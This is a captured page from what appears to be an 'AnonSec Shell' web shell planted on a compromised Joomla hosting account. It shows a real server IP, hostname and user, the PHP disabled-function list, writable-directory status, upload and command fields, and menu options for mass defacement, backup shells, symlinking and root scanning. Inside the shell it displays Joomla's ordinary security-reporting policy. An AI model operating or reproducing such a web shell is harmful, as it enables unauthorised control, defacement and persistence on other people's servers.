AnonSec Shell
Server IP : 188.40.219.11  /  Your IP : 18.219.48.116   [ Reverse IP ]
Web Server : Apache
System : Linux sr47.firestorm.ch 5.15.0-82-generic #91-Ubuntu SMP Mon Aug 14 14:14:14 UTC 2023 x86_64
User : web235 ( 10240)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec,system,proc_open,popen,show_source,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,xmlrpc_entity_decode, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode,posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname,proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, syslog, xmlrpc_entity_decode,apache_child_terminate, apache_setenv, define_syslog_variables, eval, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, openlog, exec, system
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/web235.sr47.firestorm.ch/httpdocs/.github/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/vhosts/web235.sr47.firestorm.ch/httpdocs/.github/SECURITY.md
# Security Policies and Procedures

This document outlines security procedures and policies for the `Joomla! Project`.

  * [Reporting a Bug](#reporting-a-bug)
  * [Response Handling](#response-handling)
  * [Security Announcement Policy](#security-announcement-policy)
  * [Further Details on the Joomla! Security Policies](https://security.joomla.org)

## Reporting a Bug

The `Joomla` team and community take all security bugs in `Joomla` seriously. The Joomla! Security Strike Team (JSST) oversees the project's security issues and follows some specific procedures when dealing with these issues.

If you find a possible vulnerability, please report it to the JSST using the [online form](https://developer.joomla.org/security/contact-the-team.html) or via email at security@joomla.org 

We maintain a list of [GPG keys and addresses](https://developer.joomla.org/security/gpg-keys.html) for the security@joomla.org address and members of the JSST to allow signed and encrypted communications.

To report an issue in a Joomla! extension, please submit it to the [Vulnerable Extensions List.](https://vel.joomla.org/submit-vel)

For support with a site which has been attacked, please visit the [Joomla! Forum.](https://forum.joomla.org/viewforum.php?f=714)

Thank you for improving the security of `Joomla`.

## Response Handling

The JSST aims to ensure all issues are handled in a timely manner and for clear communication between the team and issue reporters. We have established the following guidelines for responding to issue reports:

* Within 24 hours every report gets acknowledged
* Within 7 days every report gets a further response stating either
    * the issue is closed (and why)
    * the issue is still under investigation; if needed, additional information will be requested
* Within 21 days every report must be resolved unless there are exceptional circumstances requiring additional time

## Security Announcement Policy
* Verified vulnerabilities will only be publicly announced AFTER a release is issued which fixes the vulnerability.
* All announcements will contain as much information as possible, but will NOT contain step-by-step instructions for the vulnerability.
* The `Joomla! Project` will properly credit individuals and/or organizations who responsibly disclose security issues to the JSST. You can indicate the way you would like to be referred to in the advisory about the vulnerability. Our preference is to use full names. If you do not specify then we will use the contact name associated with the email address the report was received from. You can also request a pseudonym or having your name withheld.

Anon7 - 2022
AnonSec Team